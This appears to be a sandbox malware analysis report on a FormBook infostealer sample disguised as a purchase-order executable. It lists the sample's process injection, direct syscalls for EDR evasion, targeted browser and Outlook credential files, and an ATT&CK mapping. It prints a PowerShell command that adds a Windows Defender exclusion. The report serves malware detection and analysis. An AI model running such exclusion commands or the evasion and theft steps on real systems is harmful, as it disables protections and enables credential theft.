                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430AFF mov eax, dword ptr fs:[00000030h]4_2_01430AFF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430AFF mov eax, dword ptr fs:[00000030h]4_2_01430AFF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01430AFF mov eax, dword ptr fs:[00000030h]4_2_01430AFF
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01466A80 mov eax, dword ptr fs:[00000030h]4_2_01466A80
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D0AEB mov eax, dword ptr fs:[00000030h]4_2_013D0AEB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D0AEB mov eax, dword ptr fs:[00000030h]4_2_013D0AEB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D0AEB mov eax, dword ptr fs:[00000030h]4_2_013D0AEB
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0AED mov eax, dword ptr fs:[00000030h]4_2_013B0AED
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0AED mov eax, dword ptr fs:[00000030h]4_2_013B0AED
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013B0AED mov eax, dword ptr fs:[00000030h]4_2_013B0AED
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0ACE mov eax, dword ptr fs:[00000030h]4_2_013C0ACE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013C0ACE mov eax, dword ptr fs:[00000030h]4_2_013C0ACE
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142CD40 mov eax, dword ptr fs:[00000030h]4_2_0142CD40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0142CD40 mov eax, dword ptr fs:[00000030h]4_2_0142CD40
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01484D4B mov eax, dword ptr fs:[00000030h]4_2_01484D4B
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov ecx, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DAD20 mov eax, dword ptr fs:[00000030h]4_2_013DAD20
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DCD10 mov eax, dword ptr fs:[00000030h]4_2_013DCD10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013DCD10 mov ecx, dword ptr fs:[00000030h]4_2_013DCD10
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD00 mov eax, dword ptr fs:[00000030h]4_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD00 mov eax, dword ptr fs:[00000030h]4_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD00 mov eax, dword ptr fs:[00000030h]4_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD00 mov eax, dword ptr fs:[00000030h]4_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD00 mov eax, dword ptr fs:[00000030h]4_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013BAD00 mov eax, dword ptr fs:[00000030h]4_2_013BAD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013D0D01 mov eax, dword ptr fs:[00000030h]4_2_013D0D01
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01456D79 mov esi, dword ptr fs:[00000030h]4_2_01456D79
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143CD00 mov eax, dword ptr fs:[00000030h]4_2_0143CD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_0143CD00 mov eax, dword ptr fs:[00000030h]4_2_0143CD00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464D00 mov eax, dword ptr fs:[00000030h]4_2_01464D00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01464D00 mov eax, dword ptr fs:[00000030h]4_2_01464D00
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01448D0A mov eax, dword ptr fs:[00000030h]4_2_01448D0A
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460D24 mov eax, dword ptr fs:[00000030h]4_2_01460D24
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460D24 mov eax, dword ptr fs:[00000030h]4_2_01460D24
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460D24 mov eax, dword ptr fs:[00000030h]4_2_01460D24
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_01460D24 mov eax, dword ptr fs:[00000030h]4_2_01460D24
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: 4_2_013E2DBC mov eax, dword ptr fs:[00000030h]4_2_013E2DBC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6A82C1Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x5F9B424Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6A11F2Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A840CJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x69F0B5Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A12B1Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtResumeThread: Indirect: 0x4A93B00Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtSetContextThread: Indirect: 0x4A934E0Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x69F905Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x6A0C16Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5F9B3B3Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x5FA2F6DJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtQueueApcThread: Indirect: 0x4A8F322Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x5F9B1F1Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x6A835DJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A12E0Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtClose: Indirect: 0x4A8F3A7
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A84B4Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6A04F2Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFC9B2E2651Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeNtSuspendThread: Indirect: 0x4A937F0Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x6AC0C6Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x6A8552
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6A1324Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6A9944Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\PO 1202495088.exeMemory written: C:\Users\user\Desktop\PO 1202495088.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: NULL target: C:\Windows\SysWOW64\cttune.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\PO 1202495088.exeThread register set: target process: 7500Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeThread register set: target process: 7500Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeThread register set: target process: 5316Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\PO 1202495088.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: RAVCpl64.exe, 0000000C.00000002.6025445964.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 0000000C.00000000.1394714449.0000000000E41000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Managers
                Source: C:\Users\user\Desktop\PO 1202495088.exeQueries volume information: C:\Users\user\Desktop\PO 1202495088.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.PO 1202495088.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		131
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		51
                Virtualization/Sandbox Evasion                		Security Account Manager51
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials123
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
